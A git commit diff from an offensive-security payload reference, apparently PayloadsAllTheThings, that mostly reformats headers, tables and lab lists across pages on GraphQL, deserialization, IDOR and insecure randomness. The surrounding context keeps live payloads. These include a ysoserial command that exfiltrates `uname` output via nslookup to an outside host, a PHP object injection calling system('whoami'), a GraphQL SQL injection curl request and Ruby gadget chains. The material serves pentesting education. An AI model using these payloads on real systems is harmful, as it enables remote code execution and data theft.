Normalize page header for GraphQL, Deserialization, SCM

This commit is contained in:
Swissky 2024-11-10 14:37:48 +01:00
parent 2deb20a6f1
commit 2304101657
21 changed files with 262 additions and 129 deletions

View file

@ -6,17 +6,17 @@
## Summary ## Summary
* [Tools](#tools) * [Tools](#tools)
* [Enumerate](#enumerate) * [Methodology](#methodology)
* [References](#references) * [References](#references)
## Tools ## Tools
* [FSecureLABS/GWTMap](https://github.com/FSecureLABS/GWTMap) * [FSecureLABS/GWTMap](https://github.com/FSecureLABS/GWTMap) - GWTMap is a tool to help map the attack surface of Google Web Toolkit (GWT) based applications.
* [GDSSecurity/GWT-Penetration-Testing-Toolset](https://github.com/GDSSecurity/GWT-Penetration-Testing-Toolset) * [GDSSecurity/GWT-Penetration-Testing-Toolset](https://github.com/GDSSecurity/GWT-Penetration-Testing-Toolset) - A set of tools made to assist in penetration testing GWT applications.
## Enumerate ## Methodology
* Enumerate the methods of a remote application via it's bootstrap file and create a local backup of the code (selects permutation at random): * Enumerate the methods of a remote application via it's bootstrap file and create a local backup of the code (selects permutation at random):
```ps1 ```ps1

View file

@ -13,7 +13,7 @@
- [Enumerate Database Schema via Suggestions](#enumerate-database-schema-via-suggestions) - [Enumerate Database Schema via Suggestions](#enumerate-database-schema-via-suggestions)
- [Enumerate the types' definition](#enumerate-the-types-definition) - [Enumerate the types' definition](#enumerate-the-types-definition)
- [List path to reach a type](#list-path-to-reach-a-type) - [List path to reach a type](#list-path-to-reach-a-type)
- [Exploit](#exploit) - [Methodology](#methodology)
- [Extract data](#extract-data) - [Extract data](#extract-data)
- [Extract data using edges/nodes](#extract-data-using-edgesnodes) - [Extract data using edges/nodes](#extract-data-using-edgesnodes)
- [Extract data using projections](#extract-data-using-projections) - [Extract data using projections](#extract-data-using-projections)
@ -24,6 +24,7 @@
- [Injections](#injections) - [Injections](#injections)
- [NOSQL injection](#nosql-injection) - [NOSQL injection](#nosql-injection)
- [SQL injection](#sql-injection) - [SQL injection](#sql-injection)
- [Labs](#labs)
- [References](#references) - [References](#references)
@ -243,7 +244,7 @@ Found 27 ways to reach the "Skill" node from the "Query" node:
``` ```
## Exploit ## Methodology
### Extract data ### Extract data
@ -384,6 +385,19 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
``` ```
## Labs
* [PortSwigger - Accessing private GraphQL posts](https://portswigger.net/web-security/graphql/lab-graphql-reading-private-posts)
* [PortSwigger - Accidental exposure of private GraphQL fields](https://portswigger.net/web-security/graphql/lab-graphql-accidental-field-exposure)
* [PortSwigger - Finding a hidden GraphQL endpoint](https://portswigger.net/web-security/graphql/lab-graphql-find-the-endpoint)
* [PortSwigger - Bypassing GraphQL brute force protections](https://portswigger.net/web-security/graphql/lab-graphql-brute-force-protection-bypass)
* [PortSwigger - Performing CSRF exploits over GraphQL](https://portswigger.net/web-security/graphql/lab-graphql-csrf-via-graphql-api)
* [Root Me - GraphQL - Introspection](https://www.root-me.org/fr/Challenges/Web-Serveur/GraphQL-Introspection)
* [Root Me - GraphQL - Injection](https://www.root-me.org/fr/Challenges/Web-Serveur/GraphQL-Injection)
* [Root Me - GraphQL - Backend injection](https://www.root-me.org/fr/Challenges/Web-Serveur/GraphQL-Backend-injection)
* [Root Me - GraphQL - Mutation](https://www.root-me.org/fr/Challenges/Web-Serveur/GraphQL-Mutation)
## References ## References
- [Building a free open source GraphQL wordlist for penetration testing - Nohé Hinniger-Foray - August 17, 2023](https://escape.tech/blog/graphql-security-wordlist/) - [Building a free open source GraphQL wordlist for penetration testing - Nohé Hinniger-Foray - August 17, 2023](https://escape.tech/blog/graphql-security-wordlist/)

View file

@ -1,8 +1,19 @@
# Headless Browser # Headless Browser
A headless browser is a web browser without a graphical user interface. It works just like a regular browser, such as Chrome or Firefox, by interpreting HTML, CSS, and JavaScript, but it does so in the background, without displaying any visuals. > A headless browser is a web browser without a graphical user interface. It works just like a regular browser, such as Chrome or Firefox, by interpreting HTML, CSS, and JavaScript, but it does so in the background, without displaying any visuals.
Headless browsers are primarily used for automated tasks, such as web scraping, testing, and running scripts. They are particularly useful in situations where a full-fledged browser is not needed, or where resources (like memory or CPU) are limited. > Headless browsers are primarily used for automated tasks, such as web scraping, testing, and running scripts. They are particularly useful in situations where a full-fledged browser is not needed, or where resources (like memory or CPU) are limited.
## Summary
* [Headless Commands](#headless-commands)
* [Local File Read](#local-file-read)
* [Debugging Port ](#debugging-port)
* [Network](#network)
* [Port Scanning](#port-scanning)
* [DNS Rebinding](#dns-rebinding)
* [References](#references)
## Headless Commands ## Headless Commands

View file

@ -2,12 +2,13 @@
> Web applications often have hidden or undocumented parameters that are not exposed in the user interface. Fuzzing can help discover these parameters, which might be vulnerable to various attacks. > Web applications often have hidden or undocumented parameters that are not exposed in the user interface. Fuzzing can help discover these parameters, which might be vulnerable to various attacks.
## Summary ## Summary
* [Tools](#tools) * [Tools](#tools)
* [Exploit](#exploit) * [Methodology](#methodology)
* [Bruteforce parameters](#bruteforce-parameters) * [Bruteforce Parameters](#bruteforce-parameters)
* [Old parameters](#old-parameters) * [Old Parameters](#old-parameters)
* [References](#references) * [References](#references)
@ -20,9 +21,9 @@
* [devanshbatham/ParamSpider](https://github.com/devanshbatham/ParamSpider) - Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing * [devanshbatham/ParamSpider](https://github.com/devanshbatham/ParamSpider) - Mining URLs from dark corners of Web Archives for bug hunting/fuzzing/further probing
## Exploit ## Methodology
### Bruteforce parameters ### Bruteforce Parameters
* Use wordlists of common parameters and send them, look for unexpected behavior from the backend. * Use wordlists of common parameters and send them, look for unexpected behavior from the backend.
```ps1 ```ps1
@ -39,7 +40,7 @@ Wordlist examples:
- [samlists/sam-cc-parameters-mixedcase-all.txt](https://github.com/the-xentropy/samlists/blob/main/sam-cc-parameters-mixedcase-all.txt) - [samlists/sam-cc-parameters-mixedcase-all.txt](https://github.com/the-xentropy/samlists/blob/main/sam-cc-parameters-mixedcase-all.txt)
### Old parameters ### Old Parameters
Explore all the URL from your targets to find old parameters. Explore all the URL from your targets to find old parameters.

View file

@ -1,4 +1,7 @@
# .NET Serialization # .NET Deserialization
> .NET serialization is the process of converting an objects state into a format that can be easily stored or transmitted, such as XML, JSON, or binary. This serialized data can then be saved to a file, sent over a network, or stored in a database. Later, it can be deserialized to reconstruct the original object with its data intact. Serialization is widely used in .NET for tasks like caching, data transfer between applications, and session state management.
## Summary ## Summary

View file

@ -1,5 +1,8 @@
# Java Deserialization # Java Deserialization
> Java serialization is the process of converting a Java objects state into a byte stream, which can be stored or transmitted and later reconstructed (deserialized) back into the original object. Serialization in Java is primarily done using the `Serializable` interface, which marks a class as serializable, allowing it to be saved to files, sent over a network, or transferred between JVMs.
## Summary ## Summary
* [Detection](#detection) * [Detection](#detection)
@ -19,6 +22,7 @@
- Content-type = "application/x-java-serialized-object" - Content-type = "application/x-java-serialized-object"
- `"H4sIAAAAAAAAAJ"` in gzip(base64) - `"H4sIAAAAAAAAAJ"` in gzip(base64)
## Tools ## Tools
### Ysoserial ### Ysoserial
@ -33,44 +37,44 @@ java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | b
``` ```
**List of payloads included in ysoserial:** **List of payloads included in ysoserial:**
```ps1
Payload Authors Dependencies | Payload | Authors | Dependencies |
------- ------- ------------ | ------------------- | -------------------------------------- | --- |
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2 | AspectJWeaver | @Jang | aspectjweaver:1.9.2, commons-collections:3.2.2 |
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5 | BeanShell1 | @pwntester, @cschneider4711 | bsh:2.0b5 |
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11 | C3P0 | @mbechler | c3p0:0.9.5.2, mchange-commons-java:0.2.11 |
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0 | Click1 | @artsploit | click-nodeps:2.3.0, javax.servlet-api:3.1.0 |
Clojure @JackOfMostTrades clojure:1.8.0 | Clojure | @JackOfMostTrades | clojure:1.8.0 |
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 | CommonsBeanutils1 | @frohoff | commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 |
CommonsCollections1 @frohoff commons-collections:3.1 | CommonsCollections1 | @frohoff | commons-collections:3.1 |
CommonsCollections2 @frohoff commons-collections4:4.0 | CommonsCollections2 | @frohoff | commons-collections4:4.0 |
CommonsCollections3 @frohoff commons-collections:3.1 | CommonsCollections3 | @frohoff | commons-collections:3.1 |
CommonsCollections4 @frohoff commons-collections4:4.0 | CommonsCollections4 | @frohoff | commons-collections4:4.0 |
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1 | CommonsCollections5 | @matthias_kaiser, @jasinner | commons-collections:3.1 |
CommonsCollections6 @matthias_kaiser commons-collections:3.1 | CommonsCollections6 | @matthias_kaiser | commons-collections:3.1 |
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1 | CommonsCollections7 | @scristalli, @hanyrax, @EdoardoVignati | commons-collections:3.1 |
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4 | FileUpload1 | @mbechler | commons-fileupload:1.3.1, commons-io:2.4|
Groovy1 @frohoff groovy:2.3.9 | Groovy1 | @frohoff | groovy:2.3.9 |
Hibernate1 @mbechler | Hibernate1 | @mbechler | |
Hibernate2 @mbechler | Hibernate2 | @mbechler | |
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 | JBossInterceptors1 | @matthias_kaiser | javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
JRMPClient @mbechler | JRMPClient | @mbechler | |
JRMPListener @mbechler | JRMPListener | @mbechler | |
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 | JSON1 | @mbechler | json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 |
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 | JavassistWeld1 | @matthias_kaiser | javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
Jdk7u21 @frohoff | Jdk7u21 | @frohoff | |
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2 | Jython1 | @pwntester, @cschneider4711 | jython-standalone:2.5.2 |
MozillaRhino1 @matthias_kaiser js:1.7R2 | MozillaRhino1 | @matthias_kaiser | js:1.7R2 |
MozillaRhino2 @_tint0 js:1.7R2 | MozillaRhino2 | @_tint0 | js:1.7R2 |
Myfaces1 @mbechler | Myfaces1 | @mbechler | |
Myfaces2 @mbechler | Myfaces2 | @mbechler | |
ROME @mbechler rome:1.0 | ROME | @mbechler | rome:1.0 |
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE | Spring1 | @frohoff | spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE |
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 | Spring2 | @mbechler | spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 |
URLDNS @gebl | URLDNS | @gebl | |
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14 | Vaadin1 | @kai_ullrich | vaadin-server:7.7.14, vaadin-shared:7.7.14 |
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4 | Wicket1 | @jacob-baines | wicket-util:6.23.0, slf4j-api:1.6.4 |
```
### Burp extensions ### Burp extensions
@ -108,23 +112,23 @@ Wicket1 @jacob-baines wicket-util:6.23.0, s
// arguments - Gadget specific arguments // arguments - Gadget specific arguments
``` ```
Payload generators for the following marshallers are included:<br /> Payload generators for the following marshallers are included:
| Marshaller | Gadget Impact | Marshaller | Gadget Impact |
| ------------------------------- | ---------------------------------------------- | ------------------------------- | ---------------------------------------------- |
| BlazeDSAMF(0&#124;3&#124;X) | JDK only escalation to Java serialization<br/>various third party libraries RCEs | BlazeDSAMF(0&#124;3&#124;X) | JDK only escalation to Java serialization various third party libraries RCEs |
| Hessian&#124;Burlap | various third party RCEs | Hessian&#124;Burlap | various third party RCEs |
| Castor | dependency library RCE | Castor | dependency library RCE |
| Jackson | **possible JDK only RCE**, various third party RCEs | Jackson | **possible JDK only RCE**, various third party RCEs |
| Java | yet another third party RCE | Java | yet another third party RCE |
| JsonIO | **JDK only RCE** | JsonIO | **JDK only RCE** |
| JYAML | **JDK only RCE** | JYAML | **JDK only RCE** |
| Kryo | third party RCEs | Kryo | third party RCEs |
| KryoAltStrategy | **JDK only RCE** | KryoAltStrategy | **JDK only RCE** |
| Red5AMF(0&#124;3) | **JDK only RCE** | Red5AMF(0&#124;3) | **JDK only RCE** |
| SnakeYAML | **JDK only RCEs** | SnakeYAML | **JDK only RCEs** |
| XStream | **JDK only RCEs** | XStream | **JDK only RCEs** |
| YAMLBeans | third party RCE | YAMLBeans | third party RCE |
## References ## References

View file

@ -1,14 +1,17 @@
# Node Deserialization # Node Deserialization
> Node.js deserialization refers to the process of reconstructing JavaScript objects from a serialized format, such as JSON, BSON, or other formats that represent structured data. In Node.js applications, serialization and deserialization are commonly used for data storage, caching, and inter-process communication.
## Summary ## Summary
* [Exploit](#exploit) * [Methodology](#methodology)
* [node-serialize](#node-serialize) * [node-serialize](#node-serialize)
* [funcster](#funcster) * [funcster](#funcster)
* [References](#references) * [References](#references)
## Exploit ## Methodology
* In Node source code, look for: * In Node source code, look for:
* `node-serialize` * `node-serialize`
@ -47,6 +50,6 @@
## References ## References
- [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - February 9, 2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941) - [CVE-2017-5941 - National Vulnerability Database - February 9, 2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
- [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham - October 31, 2018](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf) - [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham - October 31, 2018](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
- [NodeJS Deserialization - gonczor - January 8, 2020](https://blacksheephacks.pl/nodejs-deserialization/) - [NodeJS Deserialization - gonczor - January 8, 2020](https://blacksheephacks.pl/nodejs-deserialization/)

View file

@ -1,20 +1,20 @@
# PHP Deserialization # PHP Deserialization
PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope. > PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
## Summary ## Summary
* [General concept](#general-concept) * [General Concept](#general-concept)
* [Authentication bypass](#authentication-bypass) * [Authentication Bypass](#authentication-bypass)
* [Object Injection](#object-injection) * [Object Injection](#object-injection)
* [Finding and using gadgets](#finding-and-using-gadgets) * [Finding and Using Gadgets](#finding-and-using-gadgets)
* [Phar Deserialization](#phar-deserialization) * [Phar Deserialization](#phar-deserialization)
* [Real world examples](#real-world-examples) * [Real World Examples](#real-world-examples)
* [References](#references) * [References](#references)
## General concept ## General Concept
The following magic methods will help you for a PHP Object injection The following magic methods will help you for a PHP Object injection
@ -62,9 +62,10 @@ a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}" string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}"
``` ```
## Authentication bypass
### Type juggling ## Authentication Bypass
### Type Juggling
Vulnerable code: Vulnerable code:
@ -123,7 +124,7 @@ a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
``` ```
## Finding and using gadgets ## Finding and Using Gadgets
Also called `"PHP POP Chains"`, they can be used to gain RCE on the system. Also called `"PHP POP Chains"`, they can be used to gain RCE on the system.
@ -236,7 +237,7 @@ A valid PHAR includes four elements:
``` ```
## Real world examples ## Real World Examples
* [Vanilla Forums ImportController index file_exists Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410237) * [Vanilla Forums ImportController index file_exists Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410237)
* [Vanilla Forums Xenforo password splitHash Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410212) * [Vanilla Forums Xenforo password splitHash Unserialize Remote Code Execution Vulnerability - Steven Seeley](https://hackerone.com/reports/410212)

View file

@ -1,5 +1,7 @@
# Python Deserialization # Python Deserialization
> Python deserialization is the process of reconstructing Python objects from serialized data, commonly done using formats like JSON, pickle, or YAML. The pickle module is a frequently used tool for this in Python, as it can serialize and deserialize complex Python objects, including custom classes.
## Summary ## Summary
* [Detection](#detection) * [Detection](#detection)

View file

@ -2,6 +2,7 @@
> Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications. Deserialization is the reverse of that process -- taking data structured from some format, and rebuilding it into an object - OWASP > Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications. Deserialization is the reverse of that process -- taking data structured from some format, and rebuilding it into an object - OWASP
## Summary ## Summary
* [Deserialization Identifier](#deserialization-identifier) * [Deserialization Identifier](#deserialization-identifier)
@ -42,8 +43,17 @@ POP gadgets characteristics:
## Labs ## Labs
* [Portswigger - Insecure Deserialization](https://portswigger.net/web-security/all-labs#insecure-deserialization) * [PortSwigger - Modifying serialized objects](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-objects)
* [NickstaDB/DeserLab - Java deserialization exploitation lab](https://github.com/NickstaDB/DeserLab) * [PortSwigger - Modifying serialized data types](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-modifying-serialized-data-types)
* [PortSwigger - Using application functionality to exploit insecure deserialization](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-using-application-functionality-to-exploit-insecure-deserialization)
* [PortSwigger - Arbitrary object injection in PHP](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-arbitrary-object-injection-in-php)
* [PortSwigger - Exploiting Java deserialization with Apache Commons](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-java-deserialization-with-apache-commons)
* [PortSwigger - Exploiting PHP deserialization with a pre-built gadget chain](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-php-deserialization-with-a-pre-built-gadget-chain)
* [PortSwigger - Exploiting Ruby deserialization using a documented gadget chain](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-exploiting-ruby-deserialization-using-a-documented-gadget-chain)
* [PortSwigger - Developing a custom gadget chain for Java deserialization](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-developing-a-custom-gadget-chain-for-java-deserialization)
* [PortSwigger - Developing a custom gadget chain for PHP deserialization](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-developing-a-custom-gadget-chain-for-php-deserialization)
* [PortSwigger - Using PHAR deserialization to deploy a custom gadget chain](https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-using-phar-deserialization-to-deploy-a-custom-gadget-chain)
* [NickstaDB - DeserLab](https://github.com/NickstaDB/DeserLab)
## References ## References

View file

@ -1,5 +1,8 @@
# Ruby Deserialization # Ruby Deserialization
> Ruby deserialization is the process of converting serialized data back into Ruby objects, often using formats like YAML, Marshal, or JSON. Ruby's Marshal module, for instance, is commonly used for this, as it can serialize and deserialize complex Ruby objects.
## Summary ## Summary
* [Marshal.load](#marshalload) * [Marshal.load](#marshalload)
@ -18,12 +21,14 @@ for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1
## Yaml.load ## Yaml.load
Vulnerable code Vulnerable code
```ruby ```ruby
require "yaml" require "yaml"
YAML.load(File.read("p.yml")) YAML.load(File.read("p.yml"))
``` ```
Universal gadget for ruby <= 2.7.2: Universal gadget for ruby <= 2.7.2:
```ruby ```ruby
--- !ruby/object:Gem::Requirement --- !ruby/object:Gem::Requirement
requirements: requirements:

View file

@ -1,15 +1,19 @@
# YAML Deserialization # YAML Deserialization
> YAML deserialization is the process of converting YAML-formatted data back into objects in programming languages like Python, Ruby, or Java. YAML (YAML Ain't Markup Language) is popular for configuration files and data serialization because it is human-readable and supports complex data structures.
## Summary ## Summary
* [Tools](#tools) * [Tools](#tools)
* [Exploit](#exploit) * [Methodology](#methodology)
* [PyYAML](#pyyaml) * [PyYAML](#pyyaml)
* [ruamel.yaml](#ruamelyaml) * [ruamel.yaml](#ruamelyaml)
* [Ruby](#ruby) * [Ruby](#ruby)
* [SnakeYAML](#snakeyaml) * [SnakeYAML](#snakeyaml)
* [References](#references) * [References](#references)
## Tools ## Tools
* [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) * [j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator)
@ -17,7 +21,7 @@
* [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Java Unmarshaller Security - Turning your data into code execution * [mbechler/marshalsec](https://github.com/mbechler/marshalsec) - Java Unmarshaller Security - Turning your data into code execution
## Exploit ## Methodology
### PyYAML ### PyYAML

View file

@ -1,19 +1,19 @@
# Insecure Direct Object References # Insecure Direct Object References
> Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. - OWASP > Insecure Direct Object References (IDOR) is a security vulnerability that occurs when an application allows users to directly access or modify objects (such as files, database records, or URLs) based on user-supplied input, without sufficient access controls. This means that if a user changes a parameter value (like an ID) in a URL or API request, they might be able to access or manipulate data that they arent authorized to see or modify.
## Summary ## Summary
* [Tools](#tools) * [Tools](#tools)
* [Labs](#labs) * [Methodology](#methodology)
* [Exploit](#exploit)
* [Numeric Value Parameter](#numeric-value-parameter) * [Numeric Value Parameter](#numeric-value-parameter)
* [Common Identifiers Parameter](#common-identifiers-parameter) * [Common Identifiers Parameter](#common-identifiers-parameter)
* [Weak Pseudo Random Number Generator](#weak-pseudo-random-number-generator) * [Weak Pseudo Random Number Generator](#weak-pseudo-random-number-generator)
* [Hashed Parameter](#hashed-parameter) * [Hashed Parameter](#hashed-parameter)
* [Wildcard Parameter](#wildcard-parameter) * [Wildcard Parameter](#wildcard-parameter)
* [IDOR Tips](#idor-tips) * [IDOR Tips](#idor-tips)
* [Labs](#labs)
* [References](#references) * [References](#references)
@ -24,12 +24,7 @@
- [PortSwigger/BApp Store > Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f) - [PortSwigger/BApp Store > Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f)
## Labs ## Methodology
- [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
## Exploit
IDOR stands for Insecure Direct Object Reference. It's a type of security vulnerability that arises when an application provides direct access to objects based on user-supplied input. As a result, attackers can bypass authorization and access resources in the system directly, potentially leading to unauthorized information disclosure, modification, or deletion. IDOR stands for Insecure Direct Object Reference. It's a type of security vulnerability that arises when an application provides direct access to objects based on user-supplied input. As a result, attackers can bypass authorization and access resources in the system directly, potentially leading to unauthorized information disclosure, modification, or deletion.
@ -130,6 +125,11 @@ Send a wildcard (`*`, `%`, `.`, `_`) instead of an ID, some backend might respon
* Use Parameter Pollution: `user_id=hacker_id&user_id=victim_id` * Use Parameter Pollution: `user_id=hacker_id&user_id=victim_id`
## Labs
- [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references)
## References ## References
- [From Christmas present in the blockchain to massive bug bounty - Jesse Lakerveld - March 21, 2018](http://web.archive.org/web/20180401130129/https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) - [From Christmas present in the blockchain to massive bug bounty - Jesse Lakerveld - March 21, 2018](http://web.archive.org/web/20180401130129/https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty)

View file

@ -1,5 +1,10 @@
# Insecure Management Interface # Insecure Management Interface
> Insecure Management Interface refers to vulnerabilities in administrative interfaces used for managing servers, applications, databases, or network devices. These interfaces often control sensitive settings and can have powerful access to system configurations, making them prime targets for attackers.
> Insecure Management Interfaces may lack proper security measures, such as strong authentication, encryption, or IP restrictions, allowing unauthorized users to potentially gain control over critical systems. Common issues include using default credentials, unencrypted communications, or exposing the interface to the public internet.
## Summary ## Summary
* [Springboot-Actuator](#springboot-actuator) * [Springboot-Actuator](#springboot-actuator)
@ -27,12 +32,14 @@ Note: Sensitive endpoints will require a username/password when they are accesse
Since Springboot 2.X only `/health` and `/info` are enabled by default. Since Springboot 2.X only `/health` and `/info` are enabled by default.
### Remote Code Execution via `/env` ### Remote Code Execution via `/env`
Spring is able to load external configurations in the YAML format. Spring is able to load external configurations in the YAML format.
The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks. The YAML config is parsed with the SnakeYAML library, which is susceptible to deserialization attacks.
In other words, an attacker can gain remote code execution by loading a malicious config file. In other words, an attacker can gain remote code execution by loading a malicious config file.
#### Steps #### Steps
1. Generate a payload of SnakeYAML deserialization gadget. 1. Generate a payload of SnakeYAML deserialization gadget.

View file

@ -1,16 +1,55 @@
# Insecure Randomness # Insecure Randomness
> Insecure randomness refers to the weaknesses associated with random number generation in computing, particularly when such randomness is used for security-critical purposes. Vulnerabilities in random number generators (RNGs) can lead to predictable outputs that can be exploited by attackers, resulting in potential data breaches or unauthorized access.
## Summary ## Summary
* [Methodology](#methodology)
* [Time-Based Seeds](#time-based-seeds)
* [GUID / UUID](#guid--uuid) * [GUID / UUID](#guid--uuid)
* [GUID Versions](#guid-versions) * [GUID Versions](#guid-versions)
* [Mongo ObjectId](#mongo-objectid) * [Mongo ObjectId](#mongo-objectid)
* [Uniqid](#uniqid) * [Uniqid](#uniqid)
* [mt_rand](#mt_rand) * [mt_rand](#mt_rand)
* [Other](#other) * [Custom Algorithms](#custom-algorithms)
* [References](#references) * [References](#references)
## Methodology
Insecure randomness arises when the source of randomness or the method of generating random values is not sufficiently unpredictable. This can lead to predictable outputs, which can be exploited by attackers. Below, we examine common methods that are prone to insecure randomness, including time-based seeds, GUIDs, UUIDs, MongoDB ObjectIds, and the `uniqid()` function.
## Time-Based Seeds
Many random number generators (RNGs) use the current system time (e.g., milliseconds since epoch) as a seed. This approach can be insecure because the seed value can be easily predicted, especially in automated or scripted environments.
```py
import random
import time
seed = int(time.time())
random.seed(seed)
print(random.randint(1, 100))
```
The RNG is seeded with the current time, making it predictable for anyone who knows or can estimate the seed value.
By knowing the exact time, an attacker can regenerate the correct random value, here is an example for the date `2024-11-10 13:37`.
```python
import random
import time
# Seed based on the provided timestamp
seed = int(time.mktime(time.strptime('2024-11-10 13:37', '%Y-%m-%d %H:%M')))
random.seed(seed)
# Generate the random number
print(random.randint(1, 100))
```
## GUID / UUID ## GUID / UUID
A GUID (Globally Unique Identifier) or UUID (Universally Unique Identifier) is a 128-bit number used to uniquely identify information in computer systems. They are typically represented as a string of hexadecimal digits, divided into five groups separated by hyphens, such as `550e8400-e29b-41d4-a716-446655440000`. GUIDs/UUIDs are designed to be unique across both space and time, reducing the likelihood of duplication even when generated by different systems or at different times. A GUID (Globally Unique Identifier) or UUID (Universally Unique Identifier) is a 128-bit number used to uniquely identify information in computer systems. They are typically represented as a string of hexadecimal digits, divided into five groups separated by hyphens, such as `550e8400-e29b-41d4-a716-446655440000`. GUIDs/UUIDs are designed to be unique across both space and time, reducing the likelihood of duplication even when generated by different systems or at different times.
@ -148,13 +187,17 @@ Breaking mt_rand() with two output values and no bruteforce.
``` ```
## Other ## Custom Algorithms
Other bad ideas that are sometimes shipped into production. Creating your own randomness algorithm is generally not recommended. Below are some examples found on GitHub or StackOverflow that are sometimes used in production, but may not be reliable or secure.
* `$token = md5($emailId).rand(10,9999);` * `$token = md5($emailId).rand(10,9999);`
